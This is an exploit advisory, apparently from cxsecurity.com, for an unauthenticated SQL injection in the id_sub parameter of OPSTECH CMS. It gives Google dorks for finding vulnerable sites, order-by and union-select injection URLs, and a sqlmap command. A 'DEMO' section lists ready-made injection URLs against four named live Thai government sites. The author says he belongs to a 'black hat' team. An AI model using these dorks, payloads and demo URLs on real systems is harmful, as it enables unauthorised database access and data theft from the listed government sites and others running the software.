OPSTECH (Open Source Technology) CMS - MULTI SQL INJECTION

2018.11.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

========================================================== [+] Title :- OPSTECH (Open Source Technology) CMS - SQL INJECTION [+] Date :- 6 - Nov - 2018 [+] Vendor Homepage :- http://www.opstech.co.th/ [+] Version :- All Versions [+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows [+] Category :- webapps [+] Google Dorks :- inurl:id_sub= & site:go.th intext:Copyright © 2008 by OPSTECH All Right Reserved. site:go.th [+] Exploit Author :- mr.Gh0st N@0b [+] Team name :- Myanmar Noob Hackers [+] Greedz to :- All Myanmar Black Hats [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id_sub= [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error [+] SQL vulnerable File :- /home/***/domains/XXX.go.th/public_html/core_main/index.php [+] POC :- http://127.0.0.1/index.php?mod=director_chart&path=director_chart&id_sub=[SQL]' The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction. http://127.0.0.1/index.php?mod=director_chart&path=director_chart&id_sub=221' order by [SQL IN4JECTION]--+ http://127.0.0.1/index.php?mod=director_chart&path=director_chart&id_sub=221' union all select [SQL INJECTION]--+ [+] Sqlmap sqlmap -u "http://127.0.0.1/index.php?mod=director_chart&path=director_chart&id_sub=221&id_type=1" -p id_sub --dbs --level=3 [+] DEMO :- http://www.janvan.go.th/index.php?mod=director_chart&path=director_chart&id_sub=221%20order%20by%207--%20-&id_type=1 http://www.watsuwan.go.th/index.php?mod=director_chart&path=director_chart&id_sub=221%20order%20by%207--%20-&id_type=1 http://www.nongpluang.go.th/index.php?mod=director_chart&path=director_chart&id_sub=221%20order%20by%207--%20-&id_type=1 http://kohkwang.go.th/index.php?mod=director_chart&path=director_chart&id_sub=221%20order%20by%207--%20-&id_type=1 ======================================================= # mr.Gh0st N@0b [2018-11-6]


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top